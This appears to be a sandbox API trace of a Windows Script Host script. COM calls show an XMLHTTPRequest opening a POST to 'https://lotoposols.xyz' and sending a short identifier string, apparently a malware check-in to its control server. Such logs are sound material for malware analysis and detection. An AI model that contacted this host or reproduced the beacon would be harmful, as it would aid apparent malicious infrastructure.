	[0264.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0264.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0264.874] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0264.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0264.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0264.874] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0264.874] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0264.874] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0264.874] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0264.874] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0264.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0264.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0264.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0264.875] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0264.875] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0264.875] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0264.875] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0264.875] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0264.875] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0264.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0264.875] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0264.875] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0264.875] XMLHTTPRequest:IUnknown:Release (This=0x47a5b88) returned 0x0
	[0264.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0264.875] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0264.875] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0264.875] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0264.875] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0264.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0264.876] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0264.883] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0264.883] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0264.884] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0264.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0264.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0264.885] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0264.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0264.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0264.885] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0264.885] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0264.886] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0264.886] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0264.886] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0264.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0264.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0264.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0264.886] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0264.886] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0264.886] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0264.886] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0264.886] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0264.886] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0264.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0264.887] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0264.887] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0264.887] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0264.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0264.887] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0264.887] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0264.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0264.887] XMLHTTPRequest:IDispatch:Invoke (This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0) 
	[0264.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0264.888] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a52f98 | out: ppvObject=0x5a52f98*=0x0) returned 0x80004002
	[0264.888] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0264.890] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0264.891] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x115888 | out: ppvObject=0x115888*=0x0) returned 0x80004002
	[0264.891] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2

Thread:
	id = 2
	os_tid = 0x9f8


Thread:
	id = 3
	os_tid = 0xb40

	[0036.627] GetClassInfoA (in: hInstance=0xff6e0000, lpClassName="WSH-Timer", lpWndClass=0x23efc60 | out: lpWndClass=0x23efc60) returned 0
	[0036.627] RegisterClassA (lpWndClass=0x23efc60) returned 0x9006ac169
	[0036.627] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff6e0000, lpParam=0x3c5910) returned 0x60106
	[0036.628] GetWindowLongPtrA (hWnd=0x60106, nIndex=-21) returned 0x0
	[0036.628] NtdllDefWindowProc_A (hWnd=0x60106, Msg=0x24, wParam=0x0, lParam=0x23ef650) returned 0x0
	[0036.628] GetWindowLongPtrA (hWnd=0x60106, nIndex=-21) returned 0x0
	[0036.628] SetWindowLongPtrA (hWnd=0x60106, nIndex=-21, dwNewLong=0x3c5910) returned 0x0
	[0036.628] NtdllDefWindowProc_A (hWnd=0x60106, Msg=0x81, wParam=0x0, lParam=0x23ef610) returned 0x1
	[0036.630] GetWindowLongPtrA (hWnd=0x60106, nIndex=-21) returned 0x3c5910
	[0036.630] NtdllDefWindowProc_A (hWnd=0x60106, Msg=0x83, wParam=0x0, lParam=0x23ef670) returned 0x0
	[0036.776] GetWindowLongPtrA (hWnd=0x60106, nIndex=-21) returned 0x3c5910
	[0036.776] NtdllDefWindowProc_A (hWnd=0x60106, Msg=0x1, wParam=0x0, lParam=0x23ef610) returned 0x0
	[0036.777] SetEvent (hEvent=0xd8) returned 1
	[0037.538] GetMessageA (lpMsg=0x23efc30, hWnd=0x60106, wMsgFilterMin=0x0, wMsgFilterMax=0x0) 
	[0074.032] GetWindowLongPtrA (hWnd=0x60106, nIndex=-21) returned 0x3c5910
